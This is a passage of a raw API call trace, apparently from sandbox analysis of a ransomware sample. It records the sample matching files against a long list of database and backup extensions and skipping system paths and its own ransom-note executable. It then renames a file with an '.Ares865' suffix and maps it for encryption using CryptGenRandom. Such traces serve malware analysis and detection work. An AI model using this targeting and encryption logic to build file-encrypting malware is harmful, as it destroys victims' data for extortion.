(lpString="adp") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="adp") returned 1 [0089.708] lstrlenW (lpString="alf") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="alf") returned 1 [0089.708] lstrlenW (lpString="ask") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="ask") returned 1 [0089.708] lstrlenW (lpString="btr") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="btr") returned 1 [0089.708] lstrlenW (lpString="cat") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="cat") returned 1 [0089.708] lstrlenW (lpString="cdb") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="cdb") returned 1 [0089.708] lstrlenW (lpString="ckp") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="ckp") returned 1 [0089.708] lstrlenW (lpString="cma") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="cma") returned 1 [0089.708] lstrlenW (lpString="cpd") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="cpd") returned 1 [0089.708] lstrlenW (lpString="dacpac") returned 6 [0089.708] lstrcmpiW (lpString1="Id.H1W", lpString2="dacpac") returned 1 [0089.708] lstrlenW (lpString="dad") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="dad") returned 1 [0089.708] lstrlenW (lpString="dadiagrams") returned 10 [0089.708] lstrcmpiW (lpString1="ssetId.H1W", lpString2="dadiagrams") returned 1 [0089.708] lstrlenW (lpString="daschema") returned 8 [0089.708] lstrcmpiW (lpString1="etId.H1W", lpString2="daschema") returned 1 [0089.709] lstrlenW (lpString="db-journal") returned 10 [0089.709] lstrcmpiW (lpString1="ssetId.H1W", lpString2="db-journal") returned 1 [0089.709] lstrlenW (lpString="db-shm") returned 6 [0089.709] lstrcmpiW (lpString1="Id.H1W", lpString2="db-shm") returned 1 [0089.709] lstrlenW (lpString="db-wal") returned 6 [0089.709] lstrcmpiW (lpString1="Id.H1W", lpString2="db-wal") returned 1 [0089.709] lstrlenW (lpString="dbc") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dbc") returned 1 [0089.709] lstrlenW (lpString="dbs") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dbs") returned 1 [0089.709] lstrlenW (lpString="dbt") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dbt") returned 1 [0089.709] lstrlenW (lpString="dbv") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dbv") returned 1 [0089.709] lstrlenW (lpString="dbx") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dbx") returned 1 [0089.709] lstrlenW (lpString="dcb") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dcb") returned 1 [0089.709] lstrlenW (lpString="dct") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dct") returned 1 [0089.709] lstrlenW (lpString="dcx") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dcx") returned 1 [0089.709] lstrlenW (lpString="ddl") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="ddl") returned 1 [0089.709] lstrlenW (lpString="dlis") returned 4 [0089.709] lstrcmpiW (lpString1=".H1W", lpString2="dlis") returned -1 [0089.709] lstrlenW (lpString="dp1") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dp1") returned 1 [0089.709] lstrlenW (lpString="dqy") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dqy") returned 1 [0089.709] lstrlenW (lpString="dsk") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dsk") returned 1 [0089.709] lstrlenW (lpString="dsn") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dsn") returned 1 [0089.709] lstrlenW (lpString="dtsx") returned 4 [0089.709] lstrcmpiW (lpString1=".H1W", lpString2="dtsx") returned -1 [0089.709] lstrlenW (lpString="dxl") returned 3 [0089.709] lstrcmpiW (lpString1="H1W", lpString2="dxl") returned 1 [0089.710] lstrlenW (lpString="eco") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="eco") returned 1 [0089.710] lstrlenW (lpString="ecx") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="ecx") returned 1 [0089.710] lstrlenW (lpString="edb") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="edb") returned 1 [0089.710] lstrlenW (lpString="epim") returned 4 [0089.710] lstrcmpiW (lpString1=".H1W", lpString2="epim") returned -1 [0089.710] lstrlenW (lpString="fcd") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="fcd") returned 1 [0089.710] lstrlenW (lpString="fdb") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="fdb") returned 1 [0089.710] lstrlenW (lpString="fic") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="fic") returned 1 [0089.710] lstrlenW (lpString="flexolibrary") returned 12 [0089.710] lstrcmpiW (lpString1="_AssetId.H1W", lpString2="flexolibrary") returned -1 [0089.710] lstrlenW (lpString="fm5") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="fm5") returned 1 [0089.710] lstrlenW (lpString="fmp") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="fmp") returned 1 [0089.710] lstrlenW (lpString="fmp12") returned 5 [0089.710] lstrcmpiW (lpString1="d.H1W", lpString2="fmp12") returned -1 [0089.710] lstrlenW (lpString="fmpsl") returned 5 [0089.710] lstrcmpiW (lpString1="d.H1W", lpString2="fmpsl") returned -1 [0089.710] lstrlenW (lpString="fol") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="fol") returned 1 [0089.710] lstrlenW (lpString="fp3") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="fp3") returned 1 [0089.710] lstrlenW (lpString="fp4") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="fp4") returned 1 [0089.710] lstrlenW (lpString="fp5") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="fp5") returned 1 [0089.710] lstrlenW (lpString="fp7") returned 3 [0089.710] lstrcmpiW (lpString1="H1W", lpString2="fp7") returned 1 [0089.710] lstrlenW (lpString="fpt") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="fpt") returned 1 [0089.711] lstrlenW (lpString="frm") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="frm") returned 1 [0089.711] lstrlenW (lpString="gdb") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="gdb") returned 1 [0089.711] lstrlenW (lpString="gdb") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="gdb") returned 1 [0089.711] lstrlenW (lpString="grdb") returned 4 [0089.711] lstrcmpiW (lpString1=".H1W", lpString2="grdb") returned -1 [0089.711] lstrlenW (lpString="gwi") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="gwi") returned 1 [0089.711] lstrlenW (lpString="hdb") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="hdb") returned -1 [0089.711] lstrlenW (lpString="his") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="his") returned -1 [0089.711] lstrlenW (lpString="ib") returned 2 [0089.711] lstrcmpiW (lpString1="1W", lpString2="ib") returned -1 [0089.711] lstrlenW (lpString="idb") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="idb") returned -1 [0089.711] lstrlenW (lpString="ihx") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="ihx") returned -1 [0089.711] lstrlenW (lpString="itdb") returned 4 [0089.711] lstrcmpiW (lpString1=".H1W", lpString2="itdb") returned -1 [0089.711] lstrlenW (lpString="itw") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="itw") returned -1 [0089.711] lstrlenW (lpString="jet") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="jet") returned -1 [0089.711] lstrlenW (lpString="jtx") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="jtx") returned -1 [0089.711] lstrlenW (lpString="kdb") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="kdb") returned -1 [0089.711] lstrlenW (lpString="kexi") returned 4 [0089.711] lstrcmpiW (lpString1=".H1W", lpString2="kexi") returned -1 [0089.711] lstrlenW (lpString="kexic") returned 5 [0089.711] lstrcmpiW (lpString1="d.H1W", lpString2="kexic") returned -1 [0089.711] lstrlenW (lpString="kexis") returned 5 [0089.711] lstrcmpiW (lpString1="d.H1W", lpString2="kexis") returned -1 [0089.711] lstrlenW (lpString="lgc") returned 3 [0089.711] lstrcmpiW (lpString1="H1W", lpString2="lgc") returned -1 [0089.712] lstrlenW (lpString="lwx") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="lwx") returned -1 [0089.712] lstrlenW (lpString="maf") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="maf") returned -1 [0089.712] lstrlenW (lpString="maq") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="maq") returned -1 [0089.712] lstrlenW (lpString="mar") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="mar") returned -1 [0089.712] lstrlenW (lpString="marshal") returned 7 [0089.712] lstrcmpiW (lpString1="tId.H1W", lpString2="marshal") returned 1 [0089.712] lstrlenW (lpString="mas") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="mas") returned -1 [0089.712] lstrlenW (lpString="mav") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="mav") returned -1 [0089.712] lstrlenW (lpString="maw") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="maw") returned -1 [0089.712] lstrlenW (lpString="mdbhtml") returned 7 [0089.712] lstrcmpiW (lpString1="tId.H1W", lpString2="mdbhtml") returned 1 [0089.712] lstrlenW (lpString="mdn") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="mdn") returned -1 [0089.712] lstrlenW (lpString="mdt") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="mdt") returned -1 [0089.712] lstrlenW (lpString="mfd") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="mfd") returned -1 [0089.712] lstrlenW (lpString="mpd") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="mpd") returned -1 [0089.712] lstrlenW (lpString="mrg") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="mrg") returned -1 [0089.712] lstrlenW (lpString="mud") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="mud") returned -1 [0089.712] lstrlenW (lpString="mwb") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="mwb") returned -1 [0089.712] lstrlenW (lpString="myd") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="myd") returned -1 [0089.712] lstrlenW (lpString="ndf") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="ndf") returned -1 [0089.712] lstrlenW (lpString="nnt") returned 3 [0089.712] lstrcmpiW (lpString1="H1W", lpString2="nnt") returned -1 [0089.712] lstrlenW (lpString="nrmlib") returned 6 [0089.712] lstrcmpiW (lpString1="Id.H1W", lpString2="nrmlib") returned -1 [0089.713] lstrlenW (lpString="ns2") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="ns2") returned -1 [0089.713] lstrlenW (lpString="ns3") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="ns3") returned -1 [0089.713] lstrlenW (lpString="ns4") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="ns4") returned -1 [0089.713] lstrlenW (lpString="nsf") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="nsf") returned -1 [0089.713] lstrlenW (lpString="nv") returned 2 [0089.713] lstrcmpiW (lpString1="1W", lpString2="nv") returned -1 [0089.713] lstrlenW (lpString="nv2") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="nv2") returned -1 [0089.713] lstrlenW (lpString="nwdb") returned 4 [0089.713] lstrcmpiW (lpString1=".H1W", lpString2="nwdb") returned -1 [0089.713] lstrlenW (lpString="nyf") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="nyf") returned -1 [0089.713] lstrlenW (lpString="odb") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="odb") returned -1 [0089.713] lstrlenW (lpString="odb") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="odb") returned -1 [0089.713] lstrlenW (lpString="oqy") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="oqy") returned -1 [0089.713] lstrlenW (lpString="ora") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="ora") returned -1 [0089.713] lstrlenW (lpString="orx") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="orx") returned -1 [0089.713] lstrlenW (lpString="owc") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="owc") returned -1 [0089.713] lstrlenW (lpString="p96") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="p96") returned -1 [0089.713] lstrlenW (lpString="p97") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="p97") returned -1 [0089.713] lstrlenW (lpString="pan") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="pan") returned -1 [0089.713] lstrlenW (lpString="pdb") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="pdb") returned -1 [0089.713] lstrlenW (lpString="pdm") returned 3 [0089.713] lstrcmpiW (lpString1="H1W", lpString2="pdm") returned -1 [0089.713] lstrlenW (lpString="pnz") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="pnz") returned -1 [0089.714] lstrlenW (lpString="qry") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="qry") returned -1 [0089.714] lstrlenW (lpString="qvd") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="qvd") returned -1 [0089.714] lstrlenW (lpString="rbf") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="rbf") returned -1 [0089.714] lstrlenW (lpString="rctd") returned 4 [0089.714] lstrcmpiW (lpString1=".H1W", lpString2="rctd") returned -1 [0089.714] lstrlenW (lpString="rod") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="rod") returned -1 [0089.714] lstrlenW (lpString="rodx") returned 4 [0089.714] lstrcmpiW (lpString1=".H1W", lpString2="rodx") returned -1 [0089.714] lstrlenW (lpString="rpd") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="rpd") returned -1 [0089.714] lstrlenW (lpString="rsd") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="rsd") returned -1 [0089.714] lstrlenW (lpString="sas7bdat") returned 8 [0089.714] lstrcmpiW (lpString1="etId.H1W", lpString2="sas7bdat") returned -1 [0089.714] lstrlenW (lpString="sbf") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="sbf") returned -1 [0089.714] lstrlenW (lpString="scx") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="scx") returned -1 [0089.714] lstrlenW (lpString="sdb") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="sdb") returned -1 [0089.714] lstrlenW (lpString="sdc") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="sdc") returned -1 [0089.714] lstrlenW (lpString="sdf") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="sdf") returned -1 [0089.714] lstrlenW (lpString="sis") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="sis") returned -1 [0089.714] lstrlenW (lpString="spq") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="spq") returned -1 [0089.714] lstrlenW (lpString="te") returned 2 [0089.714] lstrcmpiW (lpString1="1W", lpString2="te") returned -1 [0089.714] lstrlenW (lpString="teacher") returned 7 [0089.714] lstrcmpiW (lpString1="tId.H1W", lpString2="teacher") returned 1 [0089.714] lstrlenW (lpString="tmd") returned 3 [0089.714] lstrcmpiW (lpString1="H1W", lpString2="tmd") returned -1 [0089.715] lstrlenW (lpString="tps") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="tps") returned -1 [0089.715] lstrlenW (lpString="trc") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="trc") returned -1 [0089.715] lstrlenW (lpString="trc") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="trc") returned -1 [0089.715] lstrlenW (lpString="trm") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="trm") returned -1 [0089.715] lstrlenW (lpString="udb") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="udb") returned -1 [0089.715] lstrlenW (lpString="udl") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="udl") returned -1 [0089.715] lstrlenW (lpString="usr") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="usr") returned -1 [0089.715] lstrlenW (lpString="v12") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="v12") returned -1 [0089.715] lstrlenW (lpString="vis") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="vis") returned -1 [0089.715] lstrlenW (lpString="vpd") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="vpd") returned -1 [0089.715] lstrlenW (lpString="vvv") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="vvv") returned -1 [0089.715] lstrlenW (lpString="wdb") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="wdb") returned -1 [0089.715] lstrlenW (lpString="wmdb") returned 4 [0089.715] lstrcmpiW (lpString1=".H1W", lpString2="wmdb") returned -1 [0089.715] lstrlenW (lpString="wrk") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="wrk") returned -1 [0089.715] lstrlenW (lpString="xdb") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="xdb") returned -1 [0089.715] lstrlenW (lpString="xld") returned 3 [0089.715] lstrcmpiW (lpString1="H1W", lpString2="xld") returned -1 [0089.715] lstrlenW (lpString="xmlff") returned 5 [0089.715] lstrcmpiW (lpString1="d.H1W", lpString2="xmlff") returned -1 [0089.715] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.Ares865") returned 86 [0089.715] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w.ares865"), dwFlags=0x1) returned 1 [0089.716] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.716] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=222716) returned 1 [0089.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.717] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.718] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.718] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.718] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x36900, lpName=0x0) returned 0x15c [0089.720] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x36900) returned 0x420000 [0089.731] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.731] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.731] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.732] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0089.734] CloseHandle (hObject=0x15c) returned 1 [0089.734] CloseHandle (hObject=0x118) returned 1 [0089.734] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.734] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.734] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.735] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae409b6f, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae409b6f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x325ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help_MKWD_BestBet.H1W", cAlternateFileName="HELP_M~2.H1W")) returned 1 [0089.735] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.735] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="aoldtz.exe") returned 1 [0089.735] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2=".") returned 1 [0089.735] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="..") returned 1 [0089.735] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="windows") returned -1 [0089.735] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="bootmgr") returned 1 [0089.735] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="temp") returned -1 [0089.735] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="pagefile.sys") returned -1 [0089.736] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="boot") returned 1 [0089.736] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="ids.txt") returned -1 [0089.736] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="ntuser.dat") returned -1 [0089.736] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="perflogs") returned -1 [0089.736] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="MSBuild") returned -1 [0089.736] lstrlenW (lpString="Help_MKWD_BestBet.H1W") returned 21 [0089.736] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 78 [0089.736] lstrcpyW (in: lpString1=0x2cce472, lpString2="Help_MKWD_BestBet.H1W" | out: lpString1="Help_MKWD_BestBet.H1W") returned="Help_MKWD_BestBet.H1W" [0089.736] lstrlenW (lpString="Help_MKWD_BestBet.H1W") returned 21 [0089.736] lstrlenW (lpString="Ares865") returned 7 [0089.736] lstrcmpiW (lpString1="Bet.H1W", lpString2="Ares865") returned 1 [0089.736] lstrlenW (lpString=".dll") returned 4 [0089.736] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2=".dll") returned 1 [0089.736] lstrlenW (lpString=".lnk") returned 4 [0089.736] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2=".lnk") returned 1 [0089.736] lstrlenW (lpString=".ini") returned 4 [0089.736] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2=".ini") returned 1 [0089.736] lstrlenW (lpString=".sys") returned 4 [0089.736] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2=".sys") returned 1 [0089.736] lstrlenW (lpString="Help_MKWD_BestBet.H1W") returned 21 [0089.736] lstrlenW (lpString="bak") returned 3 [0089.736] lstrcmpiW (lpString1="H1W", lpString2="bak") returned 1 [0089.736] lstrlenW (lpString="ba_") returned 3 [0089.736] lstrcmpiW (lpString1="H1W", lpString2="ba_") returned 1 [0089.736] lstrlenW (lpString="dbb") returned 3 [0089.736] lstrcmpiW (lpString1="H1W", lpString2="dbb") returned 1 [0089.736] lstrlenW (lpString="vmdk") returned 4 [0089.736] lstrcmpiW (lpString1=".H1W", lpString2="vmdk") returned -1 [0089.736] lstrlenW (lpString="rar") returned 3 [0089.736] lstrcmpiW (lpString1="H1W", lpString2="rar") returned -1 [0089.736] lstrlenW (lpString="zip") returned 3 [0089.736] lstrcmpiW (lpString1="H1W", lpString2="zip") returned -1 [0089.736] lstrlenW (lpString="tgz") returned 3 [0089.736] lstrcmpiW (lpString1="H1W", lpString2="tgz") returned -1 [0089.736] lstrlenW (lpString="vbox") returned 4 [0089.736] lstrcmpiW (lpString1=".H1W", lpString2="vbox") returned -1 [0089.736] lstrlenW (lpString="vdi") returned 3 [0089.736] lstrcmpiW (lpString1="H1W", lpString2="vdi") returned -1 [0089.736] lstrlenW (lpString="vhd") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="vhd") returned -1 [0089.737] lstrlenW (lpString="vhdx") returned 4 [0089.737] lstrcmpiW (lpString1=".H1W", lpString2="vhdx") returned -1 [0089.737] lstrlenW (lpString="avhd") returned 4 [0089.737] lstrcmpiW (lpString1=".H1W", lpString2="avhd") returned -1 [0089.737] lstrlenW (lpString="db") returned 2 [0089.737] lstrcmpiW (lpString1="1W", lpString2="db") returned -1 [0089.737] lstrlenW (lpString="db2") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="db2") returned 1 [0089.737] lstrlenW (lpString="db3") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="db3") returned 1 [0089.737] lstrlenW (lpString="dbf") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="dbf") returned 1 [0089.737] lstrlenW (lpString="mdf") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="mdf") returned -1 [0089.737] lstrlenW (lpString="mdb") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="mdb") returned -1 [0089.737] lstrlenW (lpString="sql") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="sql") returned -1 [0089.737] lstrlenW (lpString="sqlite") returned 6 [0089.737] lstrcmpiW (lpString1="et.H1W", lpString2="sqlite") returned -1 [0089.737] lstrlenW (lpString="sqlite3") returned 7 [0089.737] lstrcmpiW (lpString1="Bet.H1W", lpString2="sqlite3") returned -1 [0089.737] lstrlenW (lpString="sqlitedb") returned 8 [0089.737] lstrcmpiW (lpString1="tBet.H1W", lpString2="sqlitedb") returned 1 [0089.737] lstrlenW (lpString="xml") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="xml") returned -1 [0089.737] lstrlenW (lpString="$er") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="$er") returned 1 [0089.737] lstrlenW (lpString="4dd") returned 3 [0089.737] lstrcmpiW 